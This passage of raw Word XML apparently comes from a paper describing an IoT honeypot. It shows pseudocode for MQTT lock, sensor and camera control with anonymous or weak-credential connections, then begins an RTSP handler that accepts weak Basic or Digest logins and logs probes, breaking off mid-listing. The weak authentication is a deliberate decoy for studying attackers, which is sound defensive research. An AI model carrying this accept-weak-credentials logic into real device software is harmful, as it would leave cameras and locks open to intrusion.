              <w:t xml:space="preserve">6:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> apply_control(topic, p):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">7:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> topic ∈ {lock/cmd, lock/set} </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">8:          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> STATE.lock_action(p)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">9:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> topic ∈ {sensor/config/set,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">10:                  sensor/cmd} </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">11:         cfg ← parse JSON </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">or</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> k=v list</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">12:         </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> STATE.sensor_config(cfg)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">13:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> topic = camera/cmd </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">14:         set recording on/off</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">15:     </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> None</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">16: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">// CONNECT: anonymous allowed,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">17: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">//   else is_weak("mqtt", u, p);</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">18: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:i/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">//   CONNACK code 0 or 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="589378CE" w14:textId="7E0FB37B" w:rsidR="003272AD" w:rsidRDefault="003272AD" w:rsidP="00F0564A">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F37E5F8" w14:textId="77777777" w:rsidR="002C2A3E" w:rsidRPr="006428C0" w:rsidRDefault="002C2A3E" w:rsidP="002C2A3E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="9022" w:name="_Toc69022"/>
      <w:r>
        <w:t xml:space="preserve">Algorithm A5 – RTSP Authentication (Basic and Digest)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9022"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="935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50"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C6601" w14:paraId="1C44353D" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Algorithm A5 RTSP DESCRIBE with Basic and Digest authentication (rtsp_honeypot.py)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="4728BCD6" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Input:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> RTSP request (method, URL, headers) from a camera client or scanner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="5AB6A575" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Output:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> 401 challenge, 404 for unknown routes, or 200 OK with a valid H.264 SDP; auth and rtsp_request events</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005C6601" w14:paraId="55E31788" w14:textId="77777777" w:rsidTr="005C6601">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="60" w:type="dxa"/>
              <w:left w:w="108" w:type="dxa"/>
              <w:bottom w:w="60" w:type="dxa"/>
              <w:right w:w="108" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">1:  </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">function</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> handle_describe(url, headers):</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">2:      log("rtsp_request", method, url)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">3:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> path(url) </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">not</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">in</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> VALID_ROUTES </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> log("rtsp_route_probe"); </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 404</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">4:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> no Authorization header </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">5:          </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">return</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 401 with WWW-Authenticate: Digest realm, nonce  AND  Basic realm</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">6:      (scheme, params) ← parse_auth_header(headers["authorization"])</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">7:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">if</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> scheme = basic </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">then</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">8:          user, pass ← base64_decode(params);  ok ← is_weak("cctv", user, pass)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">9:      </w:t>
            </w:r>
            <w:r>
              <w:rPr>
